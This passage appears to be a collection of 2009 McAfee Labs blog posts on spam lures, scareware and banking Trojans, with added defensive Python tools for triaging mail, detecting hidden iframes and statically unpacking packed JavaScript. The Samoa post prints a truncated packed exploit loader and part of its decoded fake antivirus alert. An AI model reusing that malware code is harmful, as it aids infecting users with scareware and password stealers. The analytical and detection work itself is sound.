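    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            name = info.filename
            flags = []
            ext = "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""
            if ext in EXECUTABLE_EXTS:
                flags.append("executable-extension")
            if name.count(".") >= 2:
                flags.append("double-extension")
            with z.open(info) as member:
                if member.read(2) == b"MZ":
                    flags.append("pe-magic")
            findings.append({"member": name, "size": info.file_size, "flags": flags})
    return findings


def triage(raw_message):
    """Parse a raw RFC 822 message and report sender mismatch plus zip attachment findings."""
    msg = BytesParser(policy=policy.default).parsebytes(raw_message)
    from_dom, rp_dom, mismatch = sender_check(msg)
    report = {"from_domain": from_dom, "return_path_domain": rp_dom,
              "sender_mismatch": mismatch, "attachments": []}
    for part in msg.iter_attachments():
        filename = part.get_filename() or ""
        payload = part.get_payload(decode=True) or b""
        entry = {"filename": filename, "members": []}
        if part.get_content_type() == "application/zip" or filename.lower().endswith(".zip"):
            entry["members"] = inspect_zip_members(payload)
        report["attachments"].append(entry)
    return report


if __name__ == "__main__":
    print(triage(build_sample_message()))
```

The magic-byte check is the one that matters: an icon and an extension are both under the attacker's control, while the first two bytes of a Windows executable are not. A From/Return-Path mismatch is only a heuristic (mailing lists produce it legitimately), so it belongs in a score rather than a hard block.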

Trick or Treat With Spam and Malicious Screensavers

I have previously blogged that some of the most common techniques scammers and cybercriminals use are news events and holidays. Balloon Boy and the Windows 7 launch are good examples. My colleague Sam Masiello’s blog on President Barack Obama’s Nobel Prize is another excellent example. With Halloween approaching rapidly, the tricks are already knocking on your inbox and at your browser’s window.

As usual, although the lure differs depending upon the news or event, these tricks lead to the usual suspects–fake products and pharmacy spam. Just think of it: would you like some candy or Viagra for Halloween?

[Halloween Viagra]

Here’s another:

[Holiday Scam Products]

And our favorite with a holiday spin:

[Canadian Halloween Pharmacy]

Here are a few message subjects to fear:

Approved meds available without recipe!
A HORRIFYING HALLOWEEN SALE!
ONLY TILL 31OCTOBER HALLOWEEN SALE: 40% OFF ALL OUR SOFT USE THIS DISCOUNT CODE: HALL-6666
Biggest deal this halloween
Low prices for big enlargement
Halloween discount
Annual Halloween Sale

While searching for “Halloween screensavers,” I ran across more than a few questionable websites. The following was the fifth entry on the first Google results page! No worries, we already had it flagged through our SiteAdvisor technology:

[Malicious Halloween Screensavers]

Keep your security updated and search safely this week!

    Let’s Play ‘Find the Errors’

    I’m writing this blog to demonstrate how the bad guys are getting better each day–or not, depending of your point of view.

    Once again our topic is Brazilian malware authors. Yes, the dumb ones I keep running up against.

    One of the recent versions of the PWS-Banker Trojan being distributed via spam has an interesting feature. First, let’s recall how this kind of malware usually spreads:

  • Spam with the common “click here to see photos/videos/statement/etc…” links
  • IM (MSN Messenger, Skype, etc.)

    This version of PWS-Banker, besides grabbing passwords and screenshots, also downloads Microsoft MSN Messenger. Or rather, an app that at least looks like Messenger.

    When you enter your username and password and press Enter, the app exits. But in the background it messages all your contacts on your behalf, sending friendly notes with links.

    Now, let’s play The Seven Errors Game. Below are two MSN Messenger login screens. (One is in Portuguese and the other is in English, but that is not one of the errors.)

    fake and real

    Unfortunately I am not really being fair with you, because only one of the seven errors can be seen visually. The other six are found only by behavioral analysis.

    Here are the answers, starting from the top and working downward.

    spot_the_dumbs

    1) The windows are different, and you can see the minimize/maximize/close buttons are different
    2) The help icon is the same, but when you click on it, no option is clickable
    3) The dropbox on the login name doesn’t work
    4) The status drop box doesn’t work
    5,6,7) The check boxes don’t work

    Next time something unexpected pops up on your screen, don’t enter your data right away. Check and recheck before you believe it’s real.

    Balloon Boy Spam Drifts Through Town

    It’s bad enough that we are subjected to apparently fake child-peril balloon shenanigans in the news–and I guess this was only to be expected–but it seems that spammers and scammers have latched onto Balloon Boy as a lure to sell pharmaceuticals. Given the amount of news the original story of Falcon Heene and the runaway balloon produced and the subsequent news around the possible scam, it was too attractive a lure to be ignored.

    As usual, though, despite the novelty of the news event itself, the spams lead to the same types of stuff:

    Subject: Drama With Balloon (Exclusive)

    All leading to the same fake “Canadian” pharmacy sites. (The Chinese registrant info for this one was only a few days old!):

    Bogus Canadian Pharmacy Site

    Common subjects to beware of include:

    Little boy trapped in balloon
    Boy-balloon-madness
    balloon kid’s full story
    Balloon boy died
    Drama with balloon(exclusive)

    Be careful what you click, and mind the news. It is often the lure the spammers look for.

    My thanks to colleagues Adam Wosotowsky and Sam Masiello for the samples.

    Windows 7 Beaten to the Punch by Spam

    The release of Microsoft’s next major operating system, Windows 7, is at hand. It’s timely to remind everyone that we have seen Windows 7 spam for a few months. Anything on this scale from Microsoft is too big a lure for spammers and cybercriminals to ignore. (I would be stunned if they didn’t take advantage.)

    We’ve seen subjects that include:

    Microsoft Windows 7 special offers
    Windows 7 SP 2
    Windows 7 FAQ on release
    Today’s Special Gateway Laptop + NEW Windows 7 & More Electronics Deals
    Windows7 ultimate 86% off
    Windows7 ultimate 57% off

    We at McAfee Labs have noticed these throughout both September and October–with spikes as high as 1.88 percent of total spam. That might sound like a small number, but when you consider that daily spam volumes can reach 160 billion messages, it is not insignificant.

    As always, stay aware of the trends the scams and spammers use to lure you in. Be safe and watch what you click!

    I thank my colleague Adam Wosotowsky for the background data!

    Russian Spam on YouTube

    We have blogged earlier about spammers abusing various social networking websites and taking full advantage of them to host their spam. Recently researchers at McAfee Labs came across a new spam campaign in which yet another big social networking website, YouTube, is being abused.

    As we know, YouTube is a video-sharing website on which users can upload and share videos. During a recent spam campaign, we saw that Russian spammers had created a spam video and were hosting it on YouTube. This new trend of hosting spam videos could well catch the attention of other regional spammers, so we may see spam videos in other languages, including English, Chinese, and German.

    Some of the subject lines read:

    Subject: ВАША РЕКЛАМА МОЖEТ БЫТЬ ЗДЕСЬ

    Subject: Служба e-mail раccылок

    Translated to English:

    Subject: Your advertisement can be here

    Subject: Service for e-mail distribution

    The mail body is short, with a link to YouTube. Users who clicked on the URL would have watched a short video of approximately 36 seconds in which two guys converse in Russian. At the end of the video the spammer inserts contact information such as telephone and ICQ numbers.

    Translated to English:

    Widespread distribution – http://www.youtube.com/watch?Text has been removed

    The text on the video was somewhat like this:


    Массовые рассылки реклама в интернет.  [This text in Russian was seen as a heading for sequence 2]

    Translated to English:

    Mass mailing advertisement on the Internet.

    Here are other recent spam details:

    1) Russian spam mails are seen with obfuscated phone and ICQ numbers at the end of the mail

    2) The opt-out option is missing in Russian mails

    3) The mail is generally short with a single URL

    4) Russian words in the mail body are also obfuscated

    5) The mail body text is multicolored

    6) Typical spammed categories for Russian mails include adult, lease, educational, and service/product promo

    Finally, don’t click any URLs or links in a suspicious email, and most importantly stay up to date with software patches.

    Cybercrime Organizations Turn to ‘Mafia-Style’ Structure

    In Las Vegas during this month’s McAfee FOCUS 09 conference, I listened to various speakers in the Threats and Trends track. They explained how cybercrime was now managed by individuals driving their groups according to highly professional business models.

    One of the most interesting talks was made by my colleague Dirk Kolberg, who presented on Innovative Marketing, a Ukrainian scareware company the Federal Trade Commission accused of spreading some massive “scareware” schemes–alarming messages falsely claimed that scans had detected viruses, spyware, and illegal pornography on consumers’ computers. The U.S. District Court for the District of Maryland approved the FTC’s request to call a halt to the company’s activities and freeze the assets of those behind the scams.

    Explaining that Innovative has more than 600 employees in real offices, subsidiaries in countries such as India, Poland, Canada, the United States, and Argentina, and even customer-calling centers, Dirk said the company received approximately 4.5 million order IDs in 11 months; in other words, US$180 million (at $40 each). Technical support, a professional website, and LinkedIn profiles for the company and its staff provided what appeared to be a legitimate front. Following its legal troubles, the company is now defunct, yet many employees have joined a new entity that has the same production targets.


    The same day, my colleague Dmitri Alperovitch gave an overview of the Eastern European countries’ cybercrime landscape. Like Dirk, Dmitri demonstrated the high level of organization within the cybercrime industry. The first example came from Romania, where the Bogdan Païu carding gang operated. Members were caught in the act and arrested in 2006 after they emptied the accounts of several hundred citizens of Brazil, Spain, Italy, and the United States.

    Well organized and equipped with sophisticated cloning devices, they received the personal data from Russian accomplices. Counterfeiters used the money diverted from ATMs on striptease entertainment clubs, luxury cars, luxury hotel accommodation, food, and fine drinks.

    In the second part of his talk, Dmitri presented an events timeline of the Eastern European carding underground:

    He discussed CarderPlanet and its hierarchical structure, set up like a mafia (source for the following image: NICSA-FBI-SSA, Michael J. McKeown).

    CarderPlanet was shut down in 2004 and the FTC complaint for the injunction against IMU dates from December 2008, but cybercrime gangs will always rise from their ashes.

    Around Kyiv, the making of fake antivirus software still flourishes. The latest statistics on rogue antivirus–presented by Craig Schmugar and Anthony Bettini in their session–are unequivocal.

    The last piece of news on carding and phishing demonstrates the size and the worldwide organization of the actual cybercrime gangs.

    • In France, about 70 individuals were recently indicted. They were “mules” who, via Western Union, sent the money they embezzled to Ukraine and Russia.
    • In France, a gang of Slovakian gangsters from Britain was under investigation after bank cards were used to take more than $480,000 from cash machines in northern France. Up to 50 Eastern Europeans descended on Calais from Dover early on September 11 before emptying cash points across the region. 34 were arrested, all using Barclays Bank cards. According to the police in Lille, a “Mafia-style” mastermind had used dozens of mules to empty machines at a range of banks.
    • This month in the United States, the FBI announced the results of Operation Phish Phry. After a two-year investigation, more than 50 individuals in California, Nevada, and North Carolina and nearly 50 Egyptian citizens have been charged with crimes including computer fraud, conspiracy to commit bank fraud, money laundering, and aggravated identity theft. The gang victimized hundreds and possibly thousands of account holders by stealing their financial information and using it to transfer about $1.5 million to bogus accounts they controlled. Here, too, the group was very organized, as demonstrated by a chart created with i2 Analyst’s Notebook by Gary Warner.

    All these examples support the position that Dave DeWalt discussed during Wednesday’s general session: “The bad guys are getting organized. This is not the hacker in your basement. We’re talking about organized crime, organized terrorism, and organized warfare,” DeWalt said. Identity theft, phishing, or fake alerts go through the Net. Faced with these threats, large organizations deploy solutions from multiple vendors because the truth is that no single vendor can meet all of their security and compliance needs. But today’s security threats and economic challenges demand that products from multiple vendors interoperate to provide better protection, reduce operational costs, and streamline the compliance lifecycle. This is why at FOCUS 09 DeWalt also reaffirmed his support of the McAfee Security Innovation Alliance (SIA). He described it as the “NATO” of security software, a call for a universal architecture for security standards and confirmed that McAfee is focused on improving partnerships and establishing an extended broader community through this innovative technology-partnering program.

    ASCII Art Spam Strikes Back

    Spammers are always looking for techniques that can beat spam filters. We have seen many of them: obfuscating words, embedding text in images, spoofing URLs, abusing social networking sites, and many other tricks to avoid getting caught.

    One of these techniques is ASCII art, an artful way of representing an image using text characters. These representations first appeared long ago to overcome the limitations of computers for displaying graphics.

    Example:

    ______    _____   ______    _       _____    _____     ___
    | ___ \  |  ___|  | ___ \  | |     |_   _|  /  __ \   / _ \
    | |_/ /  | |__    | |_/ /  | |       | |    | /  \/  / /_\ \
    |    /   |  __|   |  __/   | |       | |    | |      |  _  |
    | |\ \   | |___   | |      | |____  _| |_   | \__/\  | | | |
    \_| \_|  \____/   \_|      \_____/  \___/    \____/  \_| |_/

    The clever thing is that each line on its own is just a string of _, |, / and \ characters that does not resemble any part of the word “REPLICA.” If we take the entire picture into consideration, though, our eyes read it as a word. The spammers take advantage of this to pass through spam filters and still deliver their intended message.

    Not only are the words represented in this manner but even URLs can be displayed in this way to avoid the blacklisting of the domains.

    ASCII art spam is not limited to punctuation characters. The glyphs can also be built from digits, letters, or a combination of both, which can make things even harder for certain spam filters:

    dP""b8  88     db     88     88  dP"Y8
    dP      88    dPYb    88     88 `bo
    Yb      88   dP__Yb   88     88   `Y8b
     YboodP 88  dP""""Yb  88ood8 88  8bodP'

    ASCII art spam example

    In the email above we can see that the spammer is advertising a pharmacy product without using the respective words, yet still successfully conveys the message.

    We saw this spam technique some time back, but it had died off. Recently, however, we have seen an increase. McAfee customers are protected from this type of spamming technique.
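    The two ASCII-art blocks above illustrate why a word-list filter is blind to this trick: the body contains no token that spells the product name. A filter instead has to score the shape of the text. The following Python is an added example, not code from this post or from McAfee; it implements one coarse structural feature (several consecutive lines made of short, column-aligned fragments with no real words) and runs it over the two blocks quoted above plus a constructed prose message. The thresholds (`min_chars`, `min_gaps`, `min_rows`) are my own choices, not values from the post.

```python
import re

# Runs of two or more spaces between non-space characters: the column gaps that
# separate glyphs in ASCII art. Prose separates words with single spaces.
GAP_RE = re.compile(r"(?<=\S) {2,}(?=\S)")
# A run of five or more letters is almost always a real word, not a glyph fragment.
WORD_RE = re.compile(r"[A-Za-z]{5,}")


def is_art_line(line, min_chars=8, min_gaps=2):
    """Per-line feature: enough ink, column gaps, and no real word on the line."""
    stripped = line.strip()
    if len(stripped.replace(" ", "")) < min_chars:
        return False
    if WORD_RE.search(stripped):
        return False
    return len(GAP_RE.findall(stripped)) >= min_gaps


def ascii_art_blocks(body, min_rows=3):
    """Return (first, last) line-index pairs for runs of min_rows+ art-like lines."""
    lines = body.splitlines()
    blocks, run_start = [], None
    for i, line in enumerate(lines + [""]):  # sentinel flushes a trailing run
        if i < len(lines) and is_art_line(line):
            if run_start is None:
                run_start = i
            continue
        if run_start is not None and i - run_start >= min_rows:
            blocks.append((run_start, i - 1))
        run_start = None
    return blocks


def keyword_hit(body, keywords):
    """What a plain word-list filter sees: a case-insensitive substring match."""
    lowered = body.lower()
    return any(k.lower() in lowered for k in keywords)


# Sample input: the two ASCII-art blocks quoted in the post, copied verbatim.
REPLICA_ART = "\n".join([
    "______    _____   ______    _       _____    _____     ___",
    "| ___ \\  |  ___|  | ___ \\  | |     |_   _|  /  __ \\   / _ \\",
    "| |_/ /  | |__    | |_/ /  | |       | |    | /  \\/  / /_\\ \\",
    "|    /   |  __|   |  __/   | |       | |    | |      |  _  |",
    "| |\\ \\   | |___   | |      | |____  _| |_   | \\__/\\  | | | |",
    "\\_| \\_|  \\____/   \\_|      \\_____/  \\___/    \\____/  \\_| |_/",
])
PHARMACY_ART = "\n".join([
    'dP""b8  88     db     88     88  dP"Y8',
    'dP      88    dPYb    88     88 `bo',
    'Yb      88   dP__Yb   88     88   `Y8b',
    ' YboodP 88  dP""""Yb  88ood8 88  8bodP\'',
])
# Constructed prose message for contrast (not a real spam sample).
PLAIN_TEXT = (
    "Hello friend,\n"
    "We are letting you try it for FREE, you just pay the shipping costs!\n"
    "Get your Free Trial Now!\n"
    "Limited offer, reply today.\n"
)

if __name__ == "__main__":
    for name, body in [("replica", REPLICA_ART), ("pharmacy", PHARMACY_ART), ("prose", PLAIN_TEXT)]:
        print(name, "art blocks:", ascii_art_blocks(body),
              "keyword filter saw 'replica':", keyword_hit(body, ["replica"]))
```

    Note that the last line of the pharmacy block is rejected by the real-word rule (“YboodP” is six letters in a row), so the detector reports rows 0 to 2 there; this is a feature for a scoring filter, not a verdict on its own, since receipts and plain-text tables are also column-aligned.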

    Obama Nobel Prize Spam Links to Malware and Drive-By Attacks

    Just when I thought we weren’t going to see any spam campaigns related to the recent announcement of United States President Barack Obama being awarded the Nobel Peace Prize, I was proven wrong. Spammers rarely disappoint when a juicy news story hits. It’s like attracting flies to honey.

    This spam campaign questions whether Obama deserved to win the prize and claims that the country is suffering significant fallout as a result. The email then asks users to click, or copy and paste into their browsers, a link that directs them to a website where they can download more information.

    Obama Nobel Prize Spam

    If users click on the link, they are brought to a site where they see an image of Obama followed by a notification that their download will start shortly. Remember, users believe that they are about to download a report on the unrest created by Obama’s acceptance of the award.

    Obama Nobel Spam Site

    Five seconds after the page loads, users are prompted to download the file Obama_NobelPrize.exe. That is not the end of the story, however. Because users might not want to download an executable file, there is an extra bit of fun embedded within this page. Located at the bottom of the page is a little snippet of encoded JavaScript that looks like this:

    Encoded JS Script

    Decoding this JavaScript reveals that this page also attempts to silently load an iframe hosted on the tokyopharmm.com domain. The iframe attempts to load a series of PDF exploits to inject a password-stealing Trojan onto the user’s PC. We currently identify this Trojan as Generic PWS.y!hv.i.

    This is another example in which current news stories are used to lure users into downloading malware. It’s a popular tactic that is repeated over and over because it keeps working. Even if you think you can outwit the malware authors by visiting their website without downloading any files, the page could be executing JavaScript in the background. Those scripts open other pages and sites via invisible iframes, test your machine for zero-day vulnerabilities, and exploit them.
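    The silent iframe described above is only silent because it is sized to zero or hidden with CSS; once the page’s JavaScript has been decoded (or the rendered DOM captured), that is something a scanner can look for. The following Python is an added example, not code from the post or from McAfee, showing one such check with the standard library’s `html.parser`: it flags every `<iframe>` with a zero width or height, a hidden or off-screen style, or the `hidden` attribute. The sample page it scans is constructed for the demonstration, and the `iframe.invalid` hostnames are placeholders, not the domain named in the post.

```python
import re
from html.parser import HTMLParser

# CSS that makes a frame invisible or pushes it far off-screen.
HIDDEN_STYLE_RE = re.compile(
    r"display\s*:\s*none"
    r"|visibility\s*:\s*hidden"
    r"|(?:width|height)\s*:\s*0(?:px)?\b"
    r"|(?:left|top)\s*:\s*-\d{3,}",
    re.IGNORECASE,
)


def _is_zero_size(value):
    """True for width/height attribute values such as 0, "0", "0px", " 0 "."""
    if value is None:
        return False
    try:
        return float(str(value).strip().lower().rstrip("px%")) == 0
    except ValueError:
        return False


class HiddenIframeScanner(HTMLParser):
    """Collects (src, reasons) for every <iframe> a visitor would never see."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)  # html.parser lower-cases attribute names for us
        reasons = []
        if _is_zero_size(a.get("width")) or _is_zero_size(a.get("height")):
            reasons.append("zero width or height")
        if HIDDEN_STYLE_RE.search(a.get("style") or ""):
            reasons.append("hidden or off-screen via CSS")
        if "hidden" in a:
            reasons.append("hidden attribute")
        if reasons:
            self.findings.append((a.get("src"), reasons))


def find_hidden_iframes(html):
    """Scan decoded HTML and return [(src, [reason, ...]), ...] for hidden frames."""
    scanner = HiddenIframeScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page: one legitimate, visible frame and two hidden ones.
SAMPLE_PAGE = """
<html><body>
<img src="obama.jpg" alt="photo">
<p>Your download will start shortly...</p>
<iframe src="http://video.example/player" width="640" height="360"></iframe>
<iframe src="http://iframe.invalid/pdf" width="0" height="0" style="visibility:hidden"></iframe>
<iframe src="http://iframe.invalid/second" style="position:absolute; left:-9999px; top:0"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for src, reasons in find_hidden_iframes(SAMPLE_PAGE):
        print(src, "->", ", ".join(reasons))
```

    The check has to run on the HTML the browser would actually see: a frame written by `document.write` inside encoded JavaScript, as in this campaign, only appears after the script has been decoded or the DOM has been dumped from an instrumented browser.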

    McAfee Labs and the International Spy Museum

    Surrounded by a network of neon lights across the ceiling, walls of computer screens lit with grave headlines regarding our country’s digital dependence–drinking water, sewer systems, banks, government systems, all vulnerable to an electrical grid outage–I introduced my wife and my sixteen-year-old daughter to our latest McAfee endeavor, an exhibit contributor in the new International Spy Museum exhibit “Weapons of Mass Disruption.”

    Yes, you read that correctly. Your humble narrator is part of a museum exhibit.

    Nestled on the corner of 8th and F Streets in Washington, D.C., the International Spy Museum has become a must-see in our nation’s capital. It speaks to our country’s tales of espionage and the ultimate currency, intelligence. Never has a place been better suited to educate its visitors about the cybersecurity threats facing our government, our businesses, and you and me.

    As former national intelligence director Admiral Michael McConnell mentioned during the exhibit’s opening event, the Internet has created an unprecedented level of vulnerability.

    These threats, which could bowl you over in their magnitude and frequency, are constantly evolving, morphing into ever-changing but equally lethal pieces of malware–as diverse and fluid as Web 2.0 itself. In that stuff is our office, littered with Red Bull and Twinkies, where I and many other McAfee Labs researchers garner an understanding of the dark side of cyberspace activity. You know the saying: Keep your friends close but your enemies closer. It is this insight that yields information on breaking threats and a more holistic understanding of the black-hatted enemy.

    So consider again the computer wall’s grave headlines in the exhibit: “The Pentagon’s IT system is probed 360 million times a day. Twitter crashed as a result of a denial of service attack against a Georgian proponent. Is our air traffic control system protected?”

    The exhibit shouts the theme that we as an industry live and that I shared during my contribution interview. The threat is real. Even my daughter got a kick out of it.

    McAfee Labs Releases October Spam Report

    Cybercriminals are taking advantage of American concerns about healthcare by flooding the Internet with spam. According to our October Spam Report, 70 percent of global spam is now “Canadian” pharmacy spam, which takes advantage of fears of swine flu and the rising costs of Medicare and pharmaceuticals.

    Spammers generate more than 150 billion spam messages daily; that’s enough to send everyone in the world more than 30 emails every day (including people without computers). Nearly 19 out of every 20 emails are spam, and cybercriminals are growing more sophisticated with their attacks. No brands seem to be safe, and this month’s report analyzes how spammers are abusing the brands of Monopoly, The Hollywood Reporter, and even the Jewish organization Chabad to distribute malware.

    The report can be downloaded here.

    Malware and standards – is it possible?

    I am excited to be involved in the joint industry effort to define an XML format that will allow the rapid exchange of information between security companies. This work was done by the “Malware Working Group” operating as part of the “Industry Connections Security Group” (ICSG) under the umbrella of the IEEE. If you Google for “IEEE” and “ICSG” you should find the link at the top of the list: IEEE ICSG.

    About 20 people from multiple security companies contributed to the development of the proposed standard, and I am very pleased with the results. It is a simple, flexible, and powerful format that is already being used by four anti-malware companies to transmit meta-data about the prevalence of malware in the field. Wider adoption of this meta-data sharing will replace the trivial malware sample exchange of the past with a real-time exchange of threat intelligence data. Communicating the relationships between malware samples, domains, and IPs will open endless possibilities for improving the security of all Internet users.

    For example, it will allow us to describe the whole history of domains/IPs that were used by a specific malware writing group, which malware they hosted and even how the malware got installed onto users’ computers. And this can be expressed in an unambiguous way suitable for rapid automated analysis. In a word – it’s powerful!

    But there are huge benefits even in simply transmitting the most basic malware prevalence data:

    • If you are an anti-malware vendor you will be able to prioritize samples in your research queues.
    • If you are a testing organization you will be able to create more relevant test sets (for example, downgrade rare and old samples).
    • If you are an administrator you can submit consolidated field reports to anti-malware vendors and help make the Internet a safer place.

    Here is how a portion of the XML meta-data looks:

    XML meta-data

    If you are interested, the complete XML schema is available here, and if you want to get involved please get in touch with your current point of contact at McAfee Labs.

    Malware Authors Profit From Disasters

    McAfee Labs has discovered another attempt by ruthless malware authors to profit from disaster and tragedy.

    While searching for information on the earthquakes and tsunami that struck the islands of American Samoa on 29 September, I saw the following results from the Google search engine:
    searchsamoa

    Clicking on one of the links, which at first sight seem to be legitimate, would result in my machine displaying an alert for a possible infection:
    samoainfection

    What is actually happening behind the scenes of my browser (in this case Internet Explorer Version 8 on a patched Windows XP system) is that the link silently connects to a server hosted in Poland that loads an exploit obfuscated with the well-known Dean Edwards packer, which I covered in a blog last year.

    This is a snippet of the exploit being loaded:

    eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('28 61={"174":35,"295":35,"297":35,"614":35,"298":35,"233":-1,"272":"\\36\\21\\19\\36\\21\\19\\36\\36<!---->\\21\\19\\36\\36\\21\\19 \\21\\19 \\21\\19 \\36203 755\\21\\19 \\21\\19\\36\\36\\36752 131 461\\21\\19\\36\\36\\36754 726 282 645\\21\\19\\36\\36\\36787 13 795\\21\\19 \\21\\19\\36\\36\\21\\19 \\21\\19 \\21\\19 \\36796 576\\21\\19 \\21\\19\\36\\36\\36325 794 576\\21\\19\\36\\36\\36325 181\\21\\19\\36\\36\\36572 181\\21\\19\\36\\36\\36<17 31=
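    The `eval(function(p,a,c,k,e,d){…})` wrapper above is the Dean Edwards packer the post mentions: `k` is a dictionary of words, and every `\w+` token in the payload `p` is an index into it, written in base `a` (the snippet’s `e=function(c){return c}` is the plain-decimal variant). An analyst never has to run such a script to read it; the substitution can be reversed statically. The following unpacker is an added example, not code from the post or from McAfee Labs: it parses the argument list, reverses the index encoding for both the decimal and the base-36/62 variants, and rebuilds the source in one regex pass. The packed input it ships with is a harmless loop I packed by hand for the demonstration, not the malware sample above.

```python
import re

# The packer's IIFE ends with its argument list:
#   }('payload', radix, count, 'w0|w1|...'.split('|'), 0, {}))
_ARGS_RE = re.compile(
    r"}\s*\(\s*'((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,"
    r"\s*'((?:[^'\\]|\\.)*)'\s*\.split\('\|'\)",
    re.DOTALL,
)


def _js_unescape(literal):
    """Undo the escapes of a single-quoted JS string literal (enough for packer output)."""
    return re.sub(r"\\(['\\])", r"\1", literal)


def decode_index(token, radix):
    """Reverse the packer's e(): digits 0-9a-z stand for 0-35, A-Z for 36-61.

    Returns None for a token that is not a valid base-`radix` number, so the
    caller can leave it untouched exactly as the JS replace loop would.
    """
    value = 0
    for ch in token:
        if "0" <= ch <= "9" or "a" <= ch <= "z":
            digit = int(ch, 36)
        elif "A" <= ch <= "Z":
            digit = ord(ch) - 29
        else:
            return None
        if digit >= radix:
            return None
        value = value * radix + digit
    return value


def unpack(packed):
    """Statically reverse a p,a,c,k,e,d payload without evaluating any of it."""
    m = _ARGS_RE.search(packed)
    if m is None:
        raise ValueError("no p,a,c,k,e,d argument list found")
    payload = _js_unescape(m.group(1))
    radix, count = int(m.group(2)), int(m.group(3))
    words = _js_unescape(m.group(4)).split("|")
    if len(words) < count:  # the count is advisory; pad rather than fail
        words += [""] * (count - len(words))

    def lookup(match):
        token = match.group(0)
        idx = decode_index(token, radix)
        if idx is None or idx >= len(words) or words[idx] == "":
            return token  # empty dictionary slot: the word was never packed
        return words[idx]

    # One pass over every \w+ token mirrors the JS replace loop without its
    # re-replacement hazards (a substituted word is never scanned again).
    return re.sub(r"\b\w+\b", lookup, payload, flags=re.ASCII)


# Constructed sample: a harmless loop packed by hand in the same shape as the
# post's snippet (identity e(), decimal tokens). Not taken from the malware.
SAMPLE_PACKED = (
    "eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String))"
    "{while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\\\w+'};c=1};"
    "while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c])}}return p}"
    "('0 1=2;3(0 4=2;4<5;4++){1+=4}6(1)',10,7,'var|total|0|for|i|10|alert'.split('|'),0,{}))"
)

if __name__ == "__main__":
    print(unpack(SAMPLE_PACKED))
```

    Real samples are often packed several layers deep, so in practice the output is fed back through `unpack` until `_ARGS_RE` no longer matches; because nothing is evaluated, the loop is safe to run on untrusted input.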

    And this is a snippet of an interesting part of the unobfuscated version of the exploit:

    {kPromo.alerts.minimizeWindow();alert("Warning! Your PC is at risk of virus and malware attack. \r\n \r\nYour system requires immediate check!\r\nSystem Security will perform a quick and free scan of your PC for viruses and malicious programs.");kPromo.alerts.maximizeWindow()};kPromo.alerts.showWindow=
    function(e,c,b){if(!kPromo.instructions.property.isInstructionActive) if(kPromo.alerts.windows[e]==undefined){var a=(typeof(kPromo.alerts.windows.length)==undefined)?"alert_window_"+
    kPromo.alerts.windows.length:"alert_window_0";
    kPromo.alerts.windows[e]=kPromo.layouts.createLayer(a,c,b);kPromo.alerts.windows[e].foregroundContentLayer.appendChild
    (kPromo.document.getDocumentElementByID(e));
    kPromo.alerts.draggableItem.div=kPromo.alerts.windows[e].

    The exploit in turn connects to a server hosted in China that downloads (with user interaction) an executable that turns out to be yet another variant of the fake anti-virus software Windows PC Defender. For details of that software, you can see a recently published VIL here.

    After just a few minutes of the malware running, information such as the Windows Product ID and the Windows License Key on the system are sent to a server hosted in Russia.

    stealing-info

    It’s amazing how fast and well-prepared malware authors are nowadays. They seize opportunities that arise to exploit not only our machines but also our trust and confidence in the news. They make use of well-known techniques (such as search-engine optimization) strengthened by people’s emotions toward world-wide tragic events that are followed by millions (who are themselves victims of a lesser tragedy).

    Online ‘Monopoly’ a Reminder That Spammers Don’t Play Fair

    In the latest social-engineering tactic targeting online games players, a new spam campaign attempts to lure users into downloading a Monopoly game–though it’s more like a game of Russian roulette. The email is a seemingly innocuous invite from a random user (your first clue that this is something to avoid!). The message uses a subject line such as “Play Online Together” or “Tom has invited you to play Monopoly.”

    If recipients follow the link to monopoly2009.com, they are greeted with a web page that looks fairly well done. It advertises “Monopoly” while giving a brief history of the game and providing some fun facts. It also, of course, encourages users to download the app using several links dispersed throughout the page.

    No code is injected on users’ computers just by visiting the web page. They need to download and install monopoly.exe, which the site delivers. The executable file is just the first stage of the process, however. A fairly common tactic deployed by hackers is that the code installed as a result of the download is only the beginning. At this point the Trojan is activated on the victims’ computers, and it links to another computer and downloads the second stage of the malware, the piece that turns machines into a spam-sending zombie touting Canadian Pharmacy products.

    To help sell the deception, the folks who created the page include a hit counter to suggest that people are playing the game online right now. Don’t be fooled. The counter merely shows how many people have visited the page so far.

    Chinese Pharmacy Spam and Our Monthly Spam Report

    The recent onslaught of “Chinese pharmacy” spam and the DDoS attacks that took down Twitter, Facebook, and others have caused a frenzy of speculation about the Chinese government’s involvement in spam generation and acts of cyberterrorism. McAfee’s September 2009 Spam Report debunks these rumors and gets to the root of the cause.

    The report reveals the truth behind the “Chinese pharmacy” spam:

    • “Chinese pharmacy” spam appears to be the result of a need for regional pharmaceutical companies to offload excess drugs internationally, as selling excess drugs inside the country violates Chinese law. We just don’t believe this month’s onslaught is a sinister government plot.
    • Spam originating from China can often make up between 60 percent and 65 percent of today’s global email volume
    • “Chinese newsletter” spam emails were the leading type of pharmaceutical spam, with a total of 52,428 emails that contained 1,235 unique URL domains in a single day
    • If excess drugs in China cannot be sold into the legal market due to Chinese law, then they will continue to be sold on the black market

    Furthermore, the report uncovers findings that have surfaced since the August 6 DDoS attacks:

    • The August 6 spam campaign, launched in conjunction with the DDoS attacks, was not solely responsible for the downfall of the social networking sites and, in fact, was likely a mere afterthought of the attacker
    • The August 6 DDoS and spam attack was intended to target a pro-Georgian blogger, and was likely part of an intimidation campaign in retaliation for his political blogs
    • Brazil, Turkey, and India were among the top three domains from which infected machines spread the August 6 spam campaign in conjunction with the DDoS attack

    Check out the full report here.

    FIFA World Cup Scams Start Early

    It is certainly not surprising when scammers use major events such as the upcoming FIFA World Cup 2010 to fuel their scams, but I am surprised at how early they started this time!

